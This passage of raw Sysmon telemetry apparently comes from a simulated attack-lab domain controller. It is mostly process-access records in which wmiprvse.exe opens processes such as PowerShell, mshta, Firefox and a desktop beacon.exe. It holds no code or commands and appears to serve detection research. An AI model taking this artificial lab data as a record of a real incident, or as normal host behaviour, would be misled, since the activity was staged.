dows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002243030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.389{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472\PSHost.132591776832268661.13472.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002243029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\